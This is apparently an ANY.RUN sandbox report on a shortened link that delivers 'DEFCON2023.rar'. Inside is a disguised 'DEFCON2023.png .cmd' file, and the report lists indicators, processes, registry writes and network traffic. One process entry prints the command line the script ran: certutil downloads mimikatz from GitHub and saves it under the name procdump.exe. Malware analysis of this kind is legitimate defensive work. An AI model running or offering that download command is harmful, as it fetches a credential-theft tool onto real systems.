URL:

https://shorturl.at/gHJU7

Full analysis: https://app.any.run/tasks/0222e34f-d5e7-4f56-981c-1f44f9bebb09
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: December 06, 2023, 12:44:04
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MD5:

201A54B9DF2369784734ADB3BF65CE9E

SHA1:

BD10157F3BD6BE7C1084336CFF3D2577B51A9258

SHA256:

1A3426DD61760BD6DD05524D99FB6E408CEB5A4A89D2B6DEB986926F4BE8C9A8

SSDEEP:

3:N8AMRC+RP:2AMRC+RP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CertUtil for downloading files

      • cmd.exe (PID: 1992)
  • SUSPICIOUS

    • Reads settings of System Certificates

      • certutil.exe (PID: 3472)
    • Reads the Internet Settings

      • certutil.exe (PID: 3472)
  • INFO

    • Application launched itself

      • iexplore.exe (PID: 3264)
    • Manual execution by a user

      • wmpnscfg.exe (PID: 4060)
      • WinRAR.exe (PID: 2984)
      • cmd.exe (PID: 1992)
      • WinRAR.exe (PID: 2224)
      • notepad.exe (PID: 944)
      • wmpnscfg.exe (PID: 2384)
      • WinRAR.exe (PID: 4008)
    • Checks supported languages

      • wmpnscfg.exe (PID: 4060)
      • wmpnscfg.exe (PID: 2384)
    • The process uses the downloaded file

      • iexplore.exe (PID: 3264)
      • WinRAR.exe (PID: 3680)
    • Reads the computer name

      • wmpnscfg.exe (PID: 4060)
      • wmpnscfg.exe (PID: 2384)
    • Reads security settings of Internet Explorer

      • certutil.exe (PID: 3472)
    • Creates files or folders in the user directory

      • certutil.exe (PID: 3472)
    • Checks proxy server information

      • certutil.exe (PID: 3472)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
59
Monitored processes
12
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start iexplore.exe iexplore.exe wmpnscfg.exe no specs winrar.exe no specs winrar.exe no specs winrar.exe no specs winrar.exe no specs notepad.exe no specs cmd.exe calc.exe no specs certutil.exe wmpnscfg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
944"C:\Windows\System32\NOTEPAD.EXE" C:\Users\admin\Desktop\DEFCON2023.png .cmdC:\Windows\System32\notepad.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
1992"C:\Windows\System32\cmd.exe" /C "C:\Users\admin\Desktop\DEFCON2023.png .cmd" C:\Windows\System32\cmd.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
2147954552
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2224"C:\Program Files\WinRAR\WinRAR.exe" x -iext -ow -ver -- "C:\Users\admin\Desktop\DEFCON2023.rar" "?\"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
9
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
2384"C:\Program Files\Windows Media Player\wmpnscfg.exe"C:\Program Files\Windows Media Player\wmpnscfg.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
2984"C:\Program Files\WinRAR\WinRAR.exe" x -iext -ow -ver -- "C:\Users\admin\Desktop\DEFCON2023.rar" C:\Users\admin\Desktop\C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
9
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3028"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3264 CREDAT:267521 /prefetch:2C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
3264"C:\Program Files\Internet Explorer\iexplore.exe" "https://shorturl.at/gHJU7"C:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
3472certutil.exe -urlcache -split -f https://github.com/ParrotSec/mimikatz/raw/master/x64/mimikatz.exe C:\Users\LetsDefend\Downloads\procdump.exeC:\Windows\System32\certutil.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
CertUtil.exe
Exit code:
2147954552
Version:
6.1.7601.18151 (win7sp1_gdr.130512-1533)
Modules
Images
c:\windows\system32\certutil.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\certcli.dll
c:\windows\system32\atl.dll
3680"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Downloads\ab1a0215-16d6-4bc0-8b8a-c383d4bad3f1-DEFCON2023.rar"C:\Program Files\WinRAR\WinRAR.exeiexplore.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3792calc.exe C:\Windows\System32\calc.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Calculator
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\calc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
Total events
31 193
Read events
31 045
Write events
147
Delete events
1

Modification events

(PID) Process:(3264) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
Operation:writeName:NTPDaysSinceLastAutoMigration
Value:
0
(PID) Process:(3264) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
Operation:writeName:NTPLastLaunchHighDateTime
Value:
30847387
(PID) Process:(3264) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
Operation:writeName:NextCheckForUpdateHighDateTime
Value:
30847437
(PID) Process:(3264) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(3264) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(3264) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Operation:writeName:CompatibilityFlags
Value:
0
(PID) Process:(3264) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3264) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(3264) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(3264) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
Executable files
0
Suspicious files
37
Text files
21
Unknown types
0

Dropped files

PID
Process
Filename
Type
3028iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62binary
MD5:58ADABC4B48203980AE5E2C19A69EA15
SHA256:15F045B2DB104F47E882D1E0C4D794290954E5F8F46A361DA33E509152849AC7
3028iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464binary
MD5:CBBED9985BFDAFB4BBFBF0DB766C1E99
SHA256:D62C6AEFCCE8746678A1E49A3C3B2445ADC5AEA73041FE307295712E3E9633D0
3028iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\MFAQUS6V\gHJU7[1].htmhtml
MD5:61A1C5AF391AA2091B7F16A1FD7E7EE1
SHA256:F4BD25C1358922BF8DEC33D35585C094E82E0E8100E51E3F2C37EE54289863DA
3028iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D03E46CD585BBE111C712E6577BC5F07_C69782D2C9EC95E8C8965939FEC14327binary
MD5:D9592675A5EF04E159933C7A15AA286E
SHA256:92E3276D7E804ABD502718A5E473F99C7CE937FFBCD76B216D49673EB18FF536
3028iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\75CA58072B9926F763A91F0CC2798706_B5D3A17E5BEDD2EDA793611A0A74E1E8binary
MD5:E3EFE5182BB41AB2A183309291B71B85
SHA256:E7C3EF269C286F4D2EA97ACC282F21EF1D9A14A45F2283899D33D2159BD2BD44
3028iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894binary
MD5:D000F070618DA914208A613DA6D8E805
SHA256:1B91DBC9ADC4070F376BDD3A8132F9E0B2567C975C02CAF427E4AE67A91D9206
3028iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\DY534W2X\ab1a0215-16d6-4bc0-8b8a-c383d4bad3f1-DEFCON2023[1].rarcompressed
MD5:8C470CD3CDEACA6D4D3F0EADF67F7D67
SHA256:78221DD5E0977F20148C3D0677FAC94FC49C2C76D1EFB0EA772EA8B67A40BC14
3264iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF2A0F2868E408D152.TMPbinary
MD5:12ABEDD67455B14442E0F4C061908AB3
SHA256:EB7D423E4DD1844A8A95F78252CC2D7DE5AA9E4D249B0878496C7AC92FD77F58
3264iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{27380C8D-9435-11EE-A826-12A9866C77DE}.datbinary
MD5:73BBCB7D7E5B1F0372B050E67A390331
SHA256:EF4926DDEC98F0D1B1DCE7C108A6AF5977D541B1467978CB86F2F4FBFA035566
3028iexplore.exeC:\Users\admin\Downloads\ab1a0215-16d6-4bc0-8b8a-c383d4bad3f1-DEFCON2023.rar.hbcuowd.partialcompressed
MD5:8C470CD3CDEACA6D4D3F0EADF67F7D67
SHA256:78221DD5E0977F20148C3D0677FAC94FC49C2C76D1EFB0EA772EA8B67A40BC14
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
16
TCP/UDP connections
33
DNS requests
21
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3028
iexplore.exe
GET
200
88.221.110.96:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?282a5f2988aaef25
unknown
compressed
4.66 Kb
unknown
3028
iexplore.exe
GET
200
88.221.110.96:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?44e705f36e178026
unknown
compressed
4.66 Kb
unknown
3028
iexplore.exe
GET
200
142.250.186.99:80
http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D
unknown
binary
1.41 Kb
unknown
3028
iexplore.exe
GET
200
142.250.186.99:80
http://ocsp.pki.goog/gtsr1/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBQwkcLWD4LqGJ7bE7B1XZsEbmfwUAQU5K8rJnEaK0gnhS9SZizv8IkTcT4CDQIDvFCjJ1PwkYAi7fE%3D
unknown
binary
724 b
unknown
3028
iexplore.exe
GET
200
13.224.89.169:80
http://ocsp.rootg2.amazontrust.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBSIfaREXmfqfJR3TkMYnD7O5MhzEgQUnF8A36oB1zArOIiiuG1KnPIRkYMCEwZ%2FlEoqJ83z%2BsKuKwH5CO65xMY%3D
unknown
binary
1.51 Kb
unknown
3028
iexplore.exe
GET
200
108.138.2.173:80
http://o.ss2.us//MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D
unknown
binary
2.02 Kb
unknown
3028
iexplore.exe
GET
200
13.32.1.186:80
http://ocsp.r2m01.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEArdbGw%2BE7P3FuORgrzUTYg%3D
unknown
binary
471 b
unknown
3028
iexplore.exe
GET
200
18.66.142.79:80
http://ocsp.rootca1.amazontrust.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPWaOUU8%2B5VZ5%2Fa9jFTaU9pkK3FAQUhBjMhTTsvAyUlC4IWZzHshBOCggCEwdzEjgLnWaIozse2b%2BczaaODg8%3D
unknown
binary
1.39 Kb
unknown
1080
svchost.exe
GET
200
93.184.221.240:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?a7e79e1b6451585f
unknown
compressed
65.2 Kb
unknown
3264
iexplore.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
binary
471 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1080
svchost.exe
224.0.0.252:5355
unknown
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
3028
iexplore.exe
104.26.9.129:443
shorturl.at
CLOUDFLARENET
US
unknown
3028
iexplore.exe
88.221.110.96:80
ctldl.windowsupdate.com
Akamai International B.V.
DE
unknown
3028
iexplore.exe
142.250.186.99:80
ocsp.pki.goog
GOOGLE
US
whitelisted
3028
iexplore.exe
172.67.69.88:443
shorturl.at
CLOUDFLARENET
US
unknown
3028
iexplore.exe
52.219.178.2:443
files-ld.s3.us-east-2.amazonaws.com
AMAZON-02
US
unknown
2588
svchost.exe
239.255.255.250:1900
whitelisted
3028
iexplore.exe
108.138.2.173:80
o.ss2.us
AMAZON-02
US
unknown

DNS requests

Domain
IP
Reputation
shorturl.at
  • 104.26.9.129
  • 172.67.69.88
  • 104.26.8.129
whitelisted
ctldl.windowsupdate.com
  • 88.221.110.96
  • 2.16.100.168
  • 88.221.110.64
  • 93.184.221.240
whitelisted
ocsp.pki.goog
  • 142.250.186.99
whitelisted
www.shorturl.at
  • 172.67.69.88
  • 104.26.9.129
  • 104.26.8.129
whitelisted
files-ld.s3.us-east-2.amazonaws.com
  • 52.219.178.2
  • 3.5.128.128
  • 52.219.142.18
  • 52.219.179.42
  • 52.219.98.154
  • 52.219.107.2
  • 52.219.101.66
  • 52.219.105.66
unknown
o.ss2.us
  • 108.138.2.173
  • 108.138.2.10
  • 108.138.2.195
  • 108.138.2.107
whitelisted
ocsp.rootg2.amazontrust.com
  • 13.224.89.169
whitelisted
ocsp.rootca1.amazontrust.com
  • 18.66.142.79
shared
ocsp.r2m01.amazontrust.com
  • 13.32.1.186
whitelisted
iecvlist.microsoft.com
  • 152.199.19.161
whitelisted

Threats

No threats detected
No debug info